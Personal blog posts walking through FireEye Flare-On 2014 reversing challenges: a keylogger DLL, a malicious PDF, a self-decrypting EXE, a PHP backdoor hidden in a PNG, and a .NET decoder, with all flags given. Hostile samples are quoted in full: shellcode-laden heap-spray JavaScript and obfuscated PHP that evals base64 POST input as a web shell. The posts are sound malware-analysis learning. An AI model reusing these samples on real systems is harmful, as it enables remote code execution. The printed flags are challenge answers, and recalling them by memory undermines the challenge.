Sunday, November 30, 2014

Fireeye - Flare-on Challenge 5

This one was a DLL. Ooh another nice one. Most of my previous reversing success has either been PE or ELF so it's really cool to do all these cool challenges and improve.

Now a DLL is something that has a ton of functions that an EXE calls. You can't directly run a DLL...you need to make an EXE import it and then debug the EXE. At least that's how I've done it in the past :).

So I tried doing this with Olly 1.10 which comes with LoadDLL.exe. That failed and Olly got stuck. So I abandoned that idea and decided to use regsvr32 and rundll32 instead. What eventually worked was rundll32. So you load Olly up..open rundll32.exe and set Olly's arguments to the DLL (5get_it.dll, Dllmain).

http://www.iacertification.org/reverse_engineering_malware_971.html
http://www.openrce.org/forums/posts/313

Also ensure that you're using Olly 2.01 and have set it to break each time a new DLL is loaded. I had a small blog post on this here.

So eventually...I broke in at DllMain...and with the help of IDA and some F8 in Olly it was clear that svchost.dll in the system32 directory was being overwritten. A registry key was also created in HKLM\....\Run... to ensure the DLL was run each time the machine rebooted. That much was relatively easy.

Now after all this...the code seemed to jump into one of the largest functions (at 10009EB0) I have ever seen. It seemed like a massive massive switch/case loop. Here's a pic..that shows how big it truly was:










There was an API called GetAsyncKeyState...that was called and then it went into the switch-case structure. Here's a screenshot showing the code inside a couple of these functions. Take a guess what it is?

















See the 'v' and 'w' in the screenshot? That's basically what's pushed to the function at 10001000 which then appends the character 'v or 'w to the svchost.log file in System32. Each little function does similar things....just for a different character each time. In other words...this is a keylogger :)

Now I've been duped many times in the past following code down dead ends so I decided to write a little IDA script renaming all functions of this type..so I could ignore all of them and understand the rest of the program.

That code is here:- https://gist.github.com/arvinddoraiswamy/a16749ee76941e8d86c8

That made my life much easier...coz most of the code got renamed and there was very little left to look at :). The bad part was... none of the other code seemed to have anything relevant to the flag at all. :(

Okay lets run it in Olly...maybe something will turn up. Nope. It just remains in an endless loop...and logs keystrokes to svchost.log.. every single character. Now what?

Okay... lets now start opening up each of those functions...nothing super interesting until we come to 'm' and toggle the ZeroFlag....there's something different there. It makes a call to 10001240... something that none of the other letters do. Running this function causes a small message box with some ASCII ART (FLARE) to pop up.

Well awesome. That's progress. But now what? The box doesn't have the flag in it, does it? But since the box pops up...it must mean something. What? Okay.. so when does the box pop up? When I hit 'm' and the variable at 100194fc is not <=0 . Hmm.

I know how to hit 'm'... but how do force 100194fc = 1 ... or ..not <=0.. so the correct branch is taken? Right? If I can answer that...I have the flag. So we want to now search for references to 100194fc. Lets search in the IDB. Click Search - Sequence of Bytes and enter fc 94 01 10 (little endian). The only reference that's useful is an instruction...

.text:10009BF7 keylog_charbychar_10009B60 mov     dword_100194FC, 1

This means...that somewhere...some single location...it is setting 100194FC to 1. This is inside the function starting at 10009B60. What letter does that map to?

Ah...it maps to "o"... so stepping back...if we enter "o" it will set 100194fc to 1 ..and then if we press 'm' the ASCII art will pop up. Nice :).

So in other words we have to go backwards...study the values of every variable..see where it gets set to 1 and find out the next letter.

The mov instruction content to search for is given below. Byte in square brackets changes for each letter.
c7 05 [fc] 94 01 10 01 00 00 00

For "o" we need to find where 100194ec is set to 1. That is inside "c". So the last 3 letters are "com". We're very close :)

Keep going this way... and eventually you end up with the flag that is:

l0ggingdoturdot5tr0ke5atflaredashondotcom

Fireeye - Flare-On Challenge 4

This one was a malicious PDF. Ooh nice. I'd never done one of those before and get to learn something new now. So for starters I read a great paper by Didier Stevens to understand how to go about analyzing PDFs.

http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book/

As it turns out, objects can be hidden (I knew this) inside PDFs. This includes Javascript and shellcode (knew this too). What I didn't know though is how to go about extracting these malicious objects. So after following the PDF paper, I learnt how to use the tools pdfid and pdfparser. Both these are available here.

http://blog.didierstevens.com/programs/pdf-tools/

Anyway I started off looking for strings inside the PDF using a simple Hex Editor. Nothing interesting found. Run pdfid to get some information about the file...and whether there were any malicious objects inside it.

python pdfid.py C:\Users\arvind\Desktop\Fireeye_Flareon\C4\APT9001.pdf

Object 6 in the output appeared to have some malicious content hidden inside it. So obviously, the next logical step is to extract these malicious objects.

python pdf-parser.py --object 6 --filter --raw C:\Users\arvind\Desktop\Fireeye_Flareon\C4\APT9001.pdf

This resulted in a large amount of heavily obfuscated JS being revealed. Here is a sample - notice the large variable names - this is just classic "Security by obscurity"...in an attempt to throw the reverser off.

var HdPN = "";
    var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
    var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7
e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%
u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb8
5%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u0
57b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%
ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f9
1%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub
727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%
u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb
8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue
3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%
u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc93
3%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u6
94c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%
u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u846
8%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u8
3f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
    var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

    for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u379
1");
    ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
    OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
    fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;


.....

The first thing I did was do a lot of "Find-Replace" on all these variables and make them human readable. After a little bit of manual tracing...it was clear that there was this large "unescape" blob..right at the top which was doing something.

I added a few document.write() and alert() calls to print out the variable values. This was a disaster and obviously the flag isn't a JS variable value. Its UNICODE for sure...because of the %u at the start. But then it maps to Hangul characters :). Googling the name of the PDF document revealed that this was some advanced APT malware ...so I was upset that I'd now have to learn Hangul to crack this. Nothing wrong of course with that...but not er..what I wanted to spend my time learning right now :)

This turned out to be a dead end though. I mean...okay its Hangul but what now? :(. So I went back to basics...and started looking for other tools in that space. There was a new tool called peeppdf that I tried to install...but after 2 hours of fighting trying to get libemu and pylibemu installed...I gave up out of sheer boredum now and started looking at the JS again.

If it isn't Hangul or some wacky Unicode...its meaning is something else. What? So I RTFM more and find an awesome link that explains more:

http://www.thegreycorner.com/2010/01/analysing-malicious-pdf-document.html

So...it's shellcode :). That's why it did NOT render in ASCII when I was trying to print it out. Ok now...I followed the instructions on that link, used that cool little script, edited it a bit to remove the "Help" code as it did not compile...and then converted the Shellcode to C...and then compiled the C code to an Exe file using wine and mingw - http://www.jonshouse.co.uk/linuxmingw.cgi

Nice. Now I have shell code that I need to debug as usual. Load in IDA. Get entry point. Set BP in Olly on entry point. OllyDbg time :). All the useful code eventually runs from 402000.

A little F8 and you can see all those instructions magically appear. Hangul indeed. Bah :). Set a breakpoint on 4023C1. You can see the Email address in EAX :).

This EMail address is then XORed repeatedly with the word BEEF and the result is displayed in a Message Box. So really...if we'd just known that at the start and brute force XOR'd with all 4 character strings .. we'd have saved ourselves a ton of trouble :)

The Email address is: wa1ch.d3m.spl01ts@flare-on.com

Fireeye - Flare-On Challenge 3

Number 3 was another EXE file. Apart from CFF Explorer, I also load these EXEs into PEid, RDG Packer detector and Protection ID... just to get a feel of how hard it's going to be. These tools are great...but again they only compare against a signature database... so they will miss stuff too. Anyway this time...nothing was detected, all clear.

You can reverse stuff statically...in IDA or you can run it in a debugger like OllyDbg. I always prefer running things... its much quicker. And then use IDA side by side to understand the flow of code..so I can set breakpoints in the right places. Always make sure though...that you run all this stuff inside a virtual machine :D and turn outbound connections off unless you're absolutely sure of what you're doing.

So anyway I loaded this up in OllyDbg and ran it...and it crashed with an error message. Time to Step In (F7). The function exits inside 401000. Something inside this.

401000 copies a lot of code into memory. Nothing looks like ASCII. The start address (18FD47) of this "encrypted" block is then called. This means that an entire function was moved at run-time into memory and then called. Code between 18FD57 and 18FD61 XORs memory with hex 66 (f) and obtains an ASCII string in memory "and so it begins".

So already this points to...the flag eventually being in memory. The start of another encrypted block is at 18FD78. The word "nopasaurus" is compared for some reason :) and some more math results in "get ready to get no'ped..."

Slowly going through all code gives the 3rd flag ... in one of the registers (EAX I think).

The Email address is: such.5h311010101@flare-on.com

Trying to run further causes a crash at 18FF47. That's why you have to Step into and not F9 :).

It's easier to just find out where the crash happened and set a break point just before that... but I just did this slowly to show how to debug things manually.

Fireeye - Flare-On Challenge 2

The start for Challenge 2 was delayed by a few minutes due to me not reading instructions properly. The password for all the Zip files was "malware" but I didn't see this ... and wasted some time trying to crack the passwords #-o. Then I saw that all the challenges were Zip files and password protected...so it made no sense that I had to crack all of them. Some RTFM ... and I felt very stupid. Oh well :)

Unzipping reveals that there is a HTML file and an images directory. Loading up the file in a browser does nothing...and it looks very very similar to the Flare home page. Ditto for the image. It looks very similar to what's on the website. But obviously..that's not the case..rt?

The next logical step would be to take MD5 hashes of the HTML file and the PNG file. Then download the ones from the website and hash those as well. If they're the same..the hashes will match. But sometimes...a Hex editor like HXD on Ubuntu or CFF Explorer's inbuilt Hex Editor will do as well :) if you're lucky. This is one of those times.

Scrolling through the HTML source of the page...horizontally and vertically ;)... reveals a PHP directive which effectively includes a file..the image file..flare-on.png. Why?

Well...the include directive in PHP effectively means that the code inside the file is going to run directly..before any following code is run. So if I say...

include a.png

and a.png has some PHP inside... and I have PHP installed correctly the browser might (I am not sure here) detect the PHP inside... and run it.

So I opened the image file inside a Hex editor and extracted all the Obfuscated PHP and pasted it to a text file. Copied all of that into a PHP file.


$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r",
 "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5
", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");

$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 4
3, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28
, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91
, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63,
 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88,
77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37,
91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70
, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49,
 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63
, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11,
 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75,
77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 3
7, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);

$do_me="";
for($i=0;$i    $do_me=$do_me.$terms[$order[$i]];
}

print_r("$do_me");
eval($do_me);
?>


Added a few print statements into it... and printed it's content to the screen. This was the result.

$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
 

$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
 

$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
 

eval($___($__));

ASCII Decoding $___ gives --> eval(bAsE6d_DeCoDe($__)). So we Base64 decode $__ and get:

$code=base64_decode($_);
eval($code);

So we have to now decode $_ .. sigh...this is what we now get.

'if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72    \\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"]))

{
     eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44    \\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"]) );
}'

That's just a funny mix of hex and decimal ASCII representation. If it'd been any bigger than this I'd have thought of writing a script -  but since it wasn't huge...at under 3 lines... the manual lookup method would be quicker for sure.

This is what I eventually get - a11DOTthatDOTjava5crapATflareDASHonDOTcom

and replacing DOT, AT and DASH we get the 2nd Email address.
a11.that.java5crap@flare-on.com

Fireeye - Flare-On Challenge 1

I've been playing the Flare On challenge recently and got through a few levels. Its good fun and I learnt a few things. I'll write a few short blog posts on the concepts/tools/solutions of each of these challenges as and when I solve them. Here's number 1.

Number 1 is an EXE file. The first thing I always do for any Windows files is open it up in CFF Explorer. The metadata of the file talks about something called Wextract. Wextract is the name of the program in Windows that creates self extracting compressed files. So maybe... its a Zip file...or some other compressed file?

Renamed the file to C1.rar (since I had Winrar on the system) and tried to extract the file. That worked and I get a new EXE file. Throw the new file into CFF Explorer.. its a .NET executable.

The moment I see .NET .. I'm happy... because all .NET binaries can be decompiled and the actual source code retrieved. There are many such decompilers around.. I usually use DotNetPeek or IlSpy - both should be fine for such challenges. Decompiling everything shows that all of the code is in a file called Form1.cs.

On launching the binary and clicking the button shown... the picture changes and some encrypted text is shown on screen. That means that there is some code on the "Click" event that is doing something. Looking at the code shows that this is indeed the case.

There is a decode function that is triggered when a button is clicked. This basically pulls some string from the "Resources" of the program and runs the algorithm on that string. The result of that "decoding" is the junk that you see on screen.

Now .. there's nothing else in the code. At this point you know what the code is doing. So where's the flag? Well...think. You found code which encrypts A and gives you B. Neither A or B are useful. But we need some plain text EMail address... that is the final flag. This means that..we need to look for other encrypted strings to run this algorithm on.

Searching more using CFF Explorer reveals a resource called dat_secret.encode. Use the inbuilt hex editor in CFF Explorer to identify the hex bytes that are to be decoded. This is the input that needs to be passed to the decoding function.

So I pull the code from Form1.cs out and load it into an online decompiler at http://ideone.com/. I'm not too good at all at .NET so it takes me a while to compile the code :)..but eventually I manage to decode the string. I print out str1, str2, str3 and str4 to see what goes into each of those variables...using the Console.write method.

The Email address is: 3rmahg3rd.b0b.d0ge@flare-on.com

Wednesday, November 19, 2014

Deeper dive - Malware analysis :)

I've not been blogging for a while..sadly, but I've been learning quite a few things over the last few months and in general continue to keep getting better slowly at reversing and malware analysis - something I always enjoy doing :)

So now, I've decided that now that I know much more about reversing things - than I did a few years ago, I'm going to get deeper into malware analysis and debug all the different types of malware that are found over a period of time and learn ways of anlayzing all of them.

So I  made a list of topics that I'd like to learn over the next few months. I'm familiar with quite a few of them - but not all of them. It probably isn't comprehensive nor do I claim it is - but it's a nice starting point for me. Also, as I learn new things - small or big - I am going to be posting all of that regularly.

So, here's my list :) - do suggest other stuff that you feel could potentially be important and is different from the rest.
  • Disk monitoring
  • Network monitoring
  • Docx
  • VBA
  • Powershell
  • AutoIT
  • PDF
  • DLL
  • JS
  • PHP
  • ELF
  • Flash
  • Packed executables
  • Routers
  • POS
  • Memory analysis (Volatility)
  • Credit card extractors
  • ATM
  • Virtual Machine detection
  • Bootkits
  • Exploit Kits
  • Steganography
  • Learn to write better signatures (Clamav, Yara, Snort, Suricata)